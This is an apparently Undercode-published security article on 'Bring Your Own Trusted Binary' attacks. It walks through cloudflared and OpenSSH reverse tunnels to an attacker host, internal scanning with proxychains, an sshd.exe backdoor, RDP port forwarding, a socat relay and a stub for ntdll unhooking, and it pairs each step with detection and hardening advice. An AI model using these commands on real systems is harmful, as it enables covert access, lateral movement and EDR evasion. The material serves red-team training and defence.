BYOTB: The New Living-Off-the-Land Attack That Turns Trusted Binaries Into Covert Weapons + Video

Listen to this Post

Featured Image

Introduction

The “Bring Your Own Trusted Binary” (BYOTB) technique marks a paradigm shift in adversarial tradecraft, weaponising the very software security teams rely on. Attackers now bypass next-generation defences like CrowdStrike not with custom malware, but by abusing trusted, signed binaries such as Cloudflare’s `cloudflared` and OpenSSH utilities. This approach exploits the implicit trust placed in legitimate, widely used software to tunnel traffic, evade firewalls, and establish persistent access while blending into normal network activity.

Learning Objectives

– Understand how adversaries use `cloudflared` and OpenSSH to tunnel traffic over HTTPS, bypassing traditional port restrictions and EDR hooks.
– Implement step-by-step BYOTB attack chains for authorised red team exercises, covering proxy configuration, reverse port forwarding, and SOCKS proxy setup.
– Apply defensive monitoring strategies, including detection of suspicious command-line arguments, DNS logging for `argotunnel.com`, and outbound traffic restrictions on port 7844.

You Should Know

1. Establishing an Encrypted BYOTB Tunnel with Cloudflared

The core of the BYOTB technique involves using Cloudflare’s `cloudflared` binary as a transport layer for SSH, effectively concealing command‑and‑control traffic within HTTPS on port 443. This method bypasses EDR solutions that inspect network traffic and firewalls that block non‑standard ports.

Step‑by‑Step Guide – Offensive Setup

Phase 1: Prepare the cloud‑side tunnel (attacker’s Kali VM).

Start a Cloudflare tunnel using your authentication token. This creates a persistent, encrypted connection between your cloud VM and Cloudflare’s edge.

cloudflared tunnel run --token YourTokenHere

Explanation: The command initiates a tunnel that listens for incoming traffic directed to a Cloudflare hostname you control (e.g., `ssh.redteaming.org`). All data received at that hostname is forwarded to your local SSH server on port 22 of the Kali VM.

Phase 2: Connect from the compromised Windows host.

On the target Windows machine, use the same `cloudflared.exe` binary as a ProxyCommand for SSH:

ssh.exe -o ProxyCommand="cloudflared.exe access ssh --hostname %h" [email protected] -R 1080

Explanation: This command routes the SSH traffic through `cloudflared`, which encapsulates it as HTTPS and sends it to the Cloudflare hostname. The `-R 1080` flag creates a reverse port forward, establishing a SOCKS proxy on port 1080 of the Kali VM, enabling access to the internal network via `proxychains`.

Phase 3: Verify the tunnel and access the target environment.

On the Kali VM, configure `proxychains` to use the SOCKS proxy:

echo "socks5 127.0.0.1 1080" >> /etc/proxychains.conf
proxychains nmap -sT -Pn 192.168.1.0/24

Defensive Countermeasures:

– Monitor process telemetry for command‑line arguments containing the strings `tunnel` or `access`.
– Enable DNS logging to detect queries ending with `.argotunnel.com`.
– Block unnecessary outbound traffic on port 7844, which is used by Cloudflare’s WARP client as an alternative tunnelling method.

2. Double Tunnelling and WARP Client for Advanced Evasion

To defeat strict egress filtering, adversaries can chain multiple tunnels or use Cloudflare’s WARP client as a VPN‑like proxy, further obfuscating the attack.

Step‑by‑Step Guide – Offensive Setup

Phase 1: Deploy the WARP client on the target.

Download and install Cloudflare’s WARP client on the compromised Windows host:

warp-cli register
warp-cli connect

Explanation: WARP creates a full‑tunnel VPN that routes all traffic through Cloudflare, effectively hiding the true destination and evading network‑based detections.

Phase 2: Establish a double tunnel.

First, create an initial tunnel using `cloudflared` as described above. Then, inside that tunnel, launch a second layer – for example, using `chisel` or `ncat` to forward traffic through the existing SOCKS proxy. This layered approach can bypass firewall rules that block specific ports because the outer tunnel already uses port 443.

Defensive Countermeasures:

– Inspect encrypted traffic for anomalies, such as unusually long‑lived TLS sessions that never transmit typical HTTP payloads.
– Use next‑gen firewalls (NGFW) that perform deep packet inspection (DPI) to detect tunnelling protocols even within encrypted flows.

3. Deploying OpenSSH as a Standalone Backdoor on Windows

Many Windows environments lack a native SSH client. Attackers can simply bring their own, bundling the required dependencies (`libcrypto.dll`, `libssl.dll`) to gain remote access without relying on pre‑existing tools.

Step‑by‑Step Guide – Offensive Setup

Phase 1: Download and extract OpenSSH binaries.

Obtain the latest OpenSSH for Windows and place it in a writable directory (e.g., `C:\ProgramData\ssh`).

Phase 2: Start an SSH server on the target.

From an elevated command prompt:

C:\ProgramData\ssh\sshd.exe

Explanation: The server starts on port 22 by default, but you can change the port in `sshd_config`. Firewalls rarely block outbound SSH, making this an effective persistence mechanism.

Phase 3: Use SSH for reverse port forwarding.

Connect from the target back to your attack machine:

ssh.exe -R 1080:localhost:1080 [email protected]

This creates a SOCKS proxy similar to the `cloudflared` method, but using only built‑in Windows capabilities once the binary is dropped.

Defensive Countermeasures:

– Implement application whitelisting (e.g., AppLocker or Microsoft Defender Application Control) to block execution of binaries not signed by authorised vendors.
– Monitor for unauthorised `sshd.exe` processes and unexpected changes to the `sshd_config` file.
– Use file integrity monitoring to detect the introduction of new SSH binaries and verify their hashes against approved lists.

4. Lateral Movement and Relay Attacks via BYOTB

Once a tunnel is established, attackers can pivot to internal systems by leveraging the SOCKS proxy or by forwarding specific ports to other hosts.

Step‑by‑Step Guide – Offensive Setup

Phase 1: Use the established SOCKS proxy (port 1080) to scan the internal network.

On the Kali VM (the attacker’s machine), run:

proxychains nmap -sT -Pn 10.0.0.0/24

Phase 2: Forward a specific port to an internal service.

From the compromised Windows host, forward RDP (port 3389) from an internal server to your attack machine:

ssh.exe -L 13389:10.0.0.50:3389 [email protected]

Now you can connect to `localhost:13389` on your attack machine to access the internal server’s RDP service.

Phase 3: Perform a relay attack.

If the target can reach an internal web server on port 8888, you can coerce a client to connect and forward that traffic back to your malicious server:

socat TCP-LISTEN:8888,fork TCP:10.0.0.100:80

This effectively relays all connections to port 8888 on the target to port 80 of an internal web server, enabling further exploitation.

Defensive Countermeasures:

– Enforce least‑privilege network segmentation, blocking unnecessary lateral communication between segments.
– Monitor for unusual outbound connections (e.g., SSH from a workstation that never uses it).
– Deploy network detection rules for known tunnelling patterns, such as unexpected `ssh.exe` command lines.

5. Bypassing EDR User‑Mode Hooks with API Unhooking

While BYOTB focuses on trusted binaries, combining it with user‑land unhooking can further evade EDR sensors that hook `ntdll.dll`.

Step‑by‑Step Guide – Offensive Setup

Phase 1: Retrieve a clean copy of `ntdll.dll`.

From a trusted source (e.g., a known‑good system or a fresh Windows installation), copy the unmodified `ntdll.dll`.

Phase 2: Overwrite the hooked sections in memory.

Use a simple C++ snippet to map the clean DLL and replace the hooked functions:

void UnhookNtdll() {
HANDLE hProcess = GetCurrentProcess();
LPVOID ntdllBase = GetModuleHandleA("ntdll.dll");
// ... map clean ntdll and overwrite the in‑memory sections
}

This technique restores the original system calls, rendering EDR hooks ineffective.

Phase 3: Execute the BYOTB binary after unhooking.

Because the EDR can no longer intercept the system calls made by `cloudflared` or `sshd`, the tunnelling activity becomes invisible to user‑mode sensors.

Defensive Countermeasures:

– Use kernel‑based sensors or endpoint detection platforms that monitor at a lower level.
– Deploy EDR solutions that detect API unhooking attempts (e.g., by verifying the integrity of `ntdll.dll` at runtime).
– Implement behaviour‑based detection that looks for the side‑effects of tunnelling (e.g., large volumes of encrypted outbound traffic) rather than relying solely on API hooks.

What Undercode Say

– The BYOTB technique represents a natural evolution of the “living‑off‑the‑land” (LOLBAS) concept, but with a critical twist: instead of using only what is already present on the system, attackers introduce their own trusted binaries, which are digitally signed and widely used, making them indistinguishable from legitimate software.
– While traditional LOLBAS relies on Microsoft‑signed binaries already on the OS, BYOTB expands the arsenal to include third‑party tools like `cloudflared` and OpenSSH, which are equally trusted by EDRs and often whitelisted.
– The technique underscores a fundamental weakness in modern security: the over‑reliance on signature‑based and reputation‑based detection. Because Cloudflare’s binary is legitimately used by thousands of enterprises, blocking it would cause widespread operational impact, leaving a gap that attackers eagerly exploit.
– Defenders must shift towards behaviour‑based monitoring and network‑level detections, such as inspecting outbound TLS handshakes for anomalous JA3 fingerprints or monitoring for unusual command‑line parameters even for trusted binaries.
– Organisations should implement a strict “default‑deny” execution policy for binaries not explicitly required for business functions, coupled with rigorous file integrity monitoring to detect the introduction of unauthorised trusted software.

Prediction

– -1 Increased adoption by ransomware groups: Expect major ransomware operations to incorporate BYOTB as a standard evasion tool, making C2 traffic blend seamlessly with legitimate HTTPS and complicating containment efforts.
– -1 Rise of “binary reputation poisoning” attacks: Adversaries will begin compromising trusted update mechanisms to inject malicious code into widely used binaries, turning a currently effective bypass into a supply‑chain nightmare.
– +1 Emergence of AI‑driven anomaly detection: Security vendors will accelerate development of machine learning models that analyse binary behaviour in context, flagging deviations from expected usage patterns even for signed executables.
– -1 Regulatory backlash and forced vendor accountability: As BYOTB attacks cause major breaches, regulators may impose stricter liabilities on software vendors whose trusted binaries are abused, leading to more intrusive telemetry and reduced privacy.
– +1 Community‑driven defensive tooling: Open‑source projects will likely produce detection scripts and YARA rules specifically targeting known BYOTB patterns, empowering smaller security teams to defend against this technique without expensive EDR upgrades.

▶️ Related Video (84% Match):

🎯Let’s Practice For Free:

🎓 Live Courses & Certifications:

[Join Undercode Academy for Verified Certifications](https://undercode.co.uk/certifications/)

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[[email protected]](mailto:[email protected])
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

IT/Security Reporter URL:

Reported By: [Redteam Blueteam](https://www.linkedin.com/posts/redteam-blueteam-maldev-share-7457707173612158977-oAqv/) – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

[💬 Whatsapp](https://undercode.help/whatsapp) | [💬 Telegram](https://t.me/UndercodeCommunity)

📢 Follow UndercodeTesting & Stay Tuned:

[𝕏 formerly Twitter 🐦](https://x.com/undercodeupdate) | [@ Threads](https://www.threads.net/@undercodetesting) | [🔗 Linkedin](https://www.linkedin.com/company/undercodetesting/) | [🦋BlueSky](https://bsky.app/profile/undercode.bsky.social)